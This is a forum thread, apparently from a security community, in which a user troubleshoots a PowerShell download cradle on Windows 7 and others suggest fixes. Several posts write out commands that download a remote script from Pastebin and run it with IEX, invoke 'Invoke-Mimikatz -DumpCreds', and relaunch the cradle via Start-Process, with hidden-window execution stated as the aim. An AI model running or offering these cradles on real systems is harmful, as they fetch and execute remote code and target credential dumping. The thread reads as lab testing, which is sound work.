Jump to content
gueni32

Run Powershell with command options and Invoke-Expression breaks my powershell.exe [Windows 7]

Recommended Posts

Hi everybody!

So I'm simply trying some download cradles on powershell on a Windows 7. I wanted to download this test powershell script (fake Mimikatz) : https://pastebin.com/FvASwLVQ that runs calculator and print some random informations and I wanted to run the main function. So I run the following command :

powershell -c "IEX (New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/FvASwLVQ');Invoke-Mimikatz -DumpCreds"

And immediatly after that nothing happens I'm still on the same Powershell and I can't open a a new Powershell console by any means unless I restart my computer.

The thing is I tested the same command with other scripts and I get the same results...

The IEX command without the "powershell -c" works perfectly and the first command works on every Windows 10! So anyone know the problem? Thanks!

PSVersion : 5.1.14409.1005

Share this post


Link to post
Share on other sites

Try changing the "-C" to a "/C".  I noticed on Windows that sometimes the "-"s break stuff like using in wmi to launch processes with command line arguments.

 

Share this post


Link to post
Share on other sites

Thanks for your answer @PoSHMagiC0de but I tried with a simple command that have the same pattern as the first command but without script :

$var = "notepad"

powershell -c "IEX $var;notepad"

And it worked perfectly! So I don't understand...

Share this post


Link to post
Share on other sites

Wait, you launching powershell from within powershell?  If you are, that is your issue.  Depending on what you are trying to do, you will have to do  it differently.

If ran from the command line that will work.  But if within Powershell then the below will need to be done.

Start-Process "Powershell" -argumentlist "/C `"IEX (New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/FvASwLVQ');Invoke-Mimikatz -DumpCreds`""

But if you are already in Powershell, I do not see the need for the above.

Share this post


Link to post
Share on other sites

I tried to start a powershell within a powershell because I wanted to test if I can launch the download cradle in a hidden windows and that works on windows 10 but not on windows 7 so that's why I test this weird inception powershell command.

Thanks for your command with "Start-Process" I will test it tomorrow!

Share this post


Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

Loading...

  • Recently Browsing   0 members

    No registered users viewing this page.

×
×
  • Create New...